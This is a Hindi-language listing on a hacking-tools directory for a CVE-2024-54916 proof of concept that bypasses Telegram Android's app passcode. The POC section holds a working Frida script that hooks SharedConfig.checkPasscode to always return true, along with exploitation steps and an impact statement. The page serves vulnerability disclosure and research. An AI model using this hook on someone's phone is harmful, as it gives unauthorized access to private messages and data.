Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-54916 — Frida-आधारित प्रमाण-की-अवधारणा जो SharedConfig.checkPasscode को हुक करके हमेशा true लौटाने के लिए Telegram Android में प्रमाणीकरण बाईपास प्रदर्शित करती है, जिससे अनधिकृत पहुंच सक्षम होती है। | Kitploit
उपकरण/GitHubGitHub/sahalll/cve-2024-54916
एंड्रॉइड सुरक्षागतिशील विश्लेषण (सैंडबॉक्सिंग)भेद्यता विश्लेषणशोषणमोबाइल सुरक्षाबाइनरी विश्लेषणप्रमाणीकरण
GitHubsahalll/cve-2024-54916

CVE-2024-54916

Frida-आधारित प्रमाण-की-अवधारणा जो SharedConfig.checkPasscode को हुक करके हमेशा true लौटाने के लिए Telegram Android में प्रमाणीकरण बाईपास प्रदर्शित करती है, जिससे अनधिकृत पहुंच सक्षम होती है।

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-54916: Telegram apk पर प्रमाणीकरण बाईपास

Telegram Android APK v.11.7.0 के SharedConfig वर्ग में एक समस्या एक भौतिक निकट आक्रमणकारी को checkPasscode विधि के रिटर्न मान में हेरफेर करके प्रमाणीकरण को बायपास करने और विशेषाधिकार बढ़ाने की अनुमति देती है।

भेद्यता प्रकार

प्रमाणीकरण बाईपास

उत्पाद का विक्रेता

Telegram

प्रभावित उत्पाद कोड बेस

Telegram android apk v.11.7.0

प्रभावित घटक

org.telegram.messenger.SharedConfig

शोषण

लक्ष्य वर्ग और विधि की पहचान करें:

  • एप्लिकेशन में SharedConfig वर्ग पासकोड सत्यापन के तर्क का प्रबंधन करता है।
  • इस वर्ग के अंदर checkPasscode विधि दर्ज किए गए पासकोड की वैधता निर्धारित करने के लिए जिम्मेदार है।

frida का उपयोग करके विधि को हुक करें

  • SharedConfig वर्ग में checkPasscode विधि को हुक करने के लिए एक Frida स्क्रिप्ट का उपयोग किया जाता है। विधि के कार्यान्वयन को हमेशा true लौटाने के लिए बदल दिया जाता है, जिससे वास्तविक पासकोड सत्यापन को बायपास किया जाता है।

निष्पादन

  • Frida स्क्रिप्ट को ऐप चलने के दौरान (गतिशील रूप से) निष्पादित किया जाता है। उपयोगकर्ता द्वारा दर्ज किया गया कोई भी पासकोड वैध मान लिया जाएगा, जिससे अनधिकृत पहुंच की अनुमति मिलती है।

POC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

वीडियो पीओसी लिंक:-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

प्रभाव:-

यह भेद्यता एक क्लाइंट-साइड प्रमाणीकरण बाईपास समस्या है। यह उन उपयोगकर्ताओं को प्रभावित करता है जो संवेदनशील डेटा को सुरक्षित करने या विशिष्ट ऐप कार्यक्षमताओं तक पहुंच को प्रतिबंधित करने के लिए पासकोड सुविधा पर निर्भर करते हैं। इस खामी का शोषण करके, एक भौतिक निकट आक्रमणकारी पासकोड सत्यापन प्रक्रिया में हेरफेर कर सकता है, प्रमाणीकरण को बायपास कर सकता है, और ऐप के संरक्षित क्षेत्रों तक अनधिकृत पहुंच प्राप्त कर सकता है। इससे संवेदनशील उपयोगकर्ता डेटा का खुलासा या एप्लिकेशन के भीतर अनधिकृत कार्य हो सकते हैं।

टूल डाउनलोड करें